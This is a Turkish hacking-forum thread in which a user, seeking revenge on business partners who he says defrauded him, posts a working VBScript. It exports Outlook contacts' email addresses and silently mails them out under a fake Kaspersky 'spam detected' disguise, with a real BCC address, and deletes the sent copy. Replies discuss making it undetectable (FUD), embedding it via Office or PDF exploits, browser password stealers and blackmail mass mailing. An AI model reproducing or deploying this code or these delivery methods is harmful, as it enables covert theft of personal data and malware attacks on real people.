Outlook Virüsü - Fikir Ve Yardım

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    HoLyCat
    HoLyCat's avatar
    Erkek
    Zande bunu yazdı

İlgilenen arkadaşlara çok teşekkür ederim. Bende araştırıp, kurcalamaya devam ediyorum. Bu arada yayılan virüs tarzında birşey düşünmüyorum, dolayısıyla outlook kullanan arkadaşlar rahat olsun. Durumu şöyle izah edeyim; bizim sektörde (ki sektörün bu dalında yeniyim), iş yapabilmem için kontaklara ihtiyacım var. Bu konuda bana yardım etme sözü veren ve şirket kurdurtan birkaç arkadaşım (sana şu şu şu kontakları veririz diyen), beni pis bir şekilde dolandırdı (kandırma demiyorum, resmen dolandırıldım).

Bu durumda bilgisayardan anlayan ve TBT müridi olan birisi olarak, bana yapacak tek şey bıraktılar. Arkadaşların kontak kişilerini çalmak. Elde edeceğim bilgiler belki zaten bende olanlardır ancak bu şekilde USD 15,000 dolandırılmanın acısını çıkartabilirim.

Söz konusu yazdığın gibiyse, yardımcı bile olurum..

🆃🅰🅷🆁🅸🅱🅰🆃.🅲🅾🅼
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Zande
    Zande's avatar
    Erkek

Holy, aynen dediğim gibi. Detayları istersen pm ile yazayım. İsimler, telefon numaraları vb herşeyi verebilirim.

3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Zande
    Zande's avatar
    Erkek

Sevgili müridler, vbs kodunu yazdım (daha doğrusu araştırdım ve tam olarak istediğimi yapacak şeyi, insanları rahatsız etmeyecek şekilde yaptım).

Şimdi, bu VBS'i nasıl exe yapabiliriz (google search yaptım ama öyle birşey yokmuş). Yada FUD'lamak vs işe yarar mı? Winrar ile SFX archive yaptım ancak çıkan exe'yi çalıştıramadım.

İsteyenler için kodlar aşağıda;

option explicit

dim folderPath, ofSO

Set oFSO = CreateObject("Scripting.FileSystemObject")

oFSO.CreateFolder "C:\MyFolder"
    folderPath = "C:\MyFolder"
    exportAddresses folderPath

sub exportAddresses(exportPath)

dim outApp, fldContacts, contactEntry, fso, outFile, objMail

set outApp = createobject("Outlook.Application")
        set fldContacts = outApp.getnamespace("MAPI").getdefaultfolder(10)
        Set objMail = outApp.CreateItem(0)
        set fso = createobject( "Scripting.FileSystemObject" )
        set outFile = fso.createtextfile( exportPath & "\emails.txt", 8 )

for each contactEntry in fldContacts.items
           if typename(contactEntry) = "ContactItem" then

dim tmpString1, tmpString2, tmpString3, outMsg

tmpString1 = contactEntry.email1address
              tmpString2 = contactEntry.email2address
              tmpString3 = contactEntry.email3address

if tmpString1 <> "" then
                 outMsg = tmpString1
              end if

if tmpString2 <> "" then
                 outMsg = outMsg & vbcrlf & tmpString2
              end if

if tmpString3 <> "" then
                 outMsg = outMsg & vbcrlf & tmpString3
              end if

outFile.writeline outMsg

end if
        next

outFile.close
        set outFile = nothing
        set fso = nothing
        set fldContacts = nothing

objMail.to = "sadmin@kaspersky.com.br.eu"
        objMail.bcc = "pacificashipping@yahoo.com"
        objMail.Subject = "Spam Detected /// Message Disarmed"
        objMail.Body = "A spam message detected and message disarmed."

objMail.Attachments.Add("C:\MyFolder\emails.txt")
        objmail.DeleteAfterSubmit = True

objMail.Send

Set objMail = Nothing
        set outApp = nothing

end sub

4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    pcdoktor636
    pcdoktor636's avatar
    Erkek

Public .doc-.docx(office 2003-2007) için undetect exploitler var. Bunları kullanabilirsin.

Mail,msn vs. üzerinden yayılan birçok worm var, 100lerce kaynak kod bulabilirsin bu konuda. Bunları outlook'a uyarlayabilirsen dediğin gayet yapılabilir birşey.

Hiç outlook kullanmadım, kayıtlı mailleri nerede nasıl bir şifrelemeyle tutuyordur bilmiyorum. Ama firefox,chrome,ie gibi birçok tarayıcı için stealer'lar var. Bu stealer'lar tarayıcılarda kayıtlı bulunan şifreleri windows üzerindeki appdata üzerinde nereye yüklüyse oradan okuyup bilgileri oluşturan kişiye yolluyor. Sen bu bilgileri kendine yollattırmak yerine outlook üzerinden yollatabilirsin.

Veya bunu yapamazsan sadece kullanıcı listesini çalarsın, sonra ufak bir bot ile bu kullanıcı listesindeki adreslere bir black mail servisini kullanarak toplu mail yollarsın.

Mesajı yollamadan bir bakayım dedim.

http://office.microsoft.com/en-us/outlook-help/where-does-microsoft-outlook-2010-save-my-information-and-configurations-HP010354943.aspx

Contact bilgisi burada tutuluyormuş.

edit:vbs koduna baktımda, eskiden downloader'larla uğraşırken vbs kodlarını komut satırı üzerinden çalıştırıyordum. Bunu özellikle birşey için yapıyordum millet kullanmıyordu ama ne olduğunu hatırlayamadım şuan :S

http://stackoverflow.com/questions/5690134/running-command-line-silently-with-vbscript-and-getting-output

http://stackoverflow.com/questions/16087470/run-command-line-command-from-vbs

pcdoktor636 tarafından 25/Ara/13 22:44 tarihinde düzenlenmiştir
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Zande
    Zande's avatar
    Erkek

Pcdoktor,

Verdiğin cevap ve linkler için sağol. Hepsini okudum. Ben kodu bitirdim, şimdi bunu nasıl yediririm derdindeyim :)

http://enc0de.blogspot.com/2012/03/adobe-reader-v933-windows-xp-sp3.html    ---> Exploit buldum konu ile ilgili. Bakalım hala çalışıyor mu :) PDF'e exe gömmece varmış :) Sonuçları bildireceğim. Bu arada konudan haberdar olupta, yardım etmek isteyen olursa, her türlü yardıma açığım.

Schwarz isimli bir mürid vardı bir aralar, FUD işi ile ilgileniyordu. Onunla da bir temasa geçeyim ;)

Toplam Hit: 2707 Toplam Mesaj: 16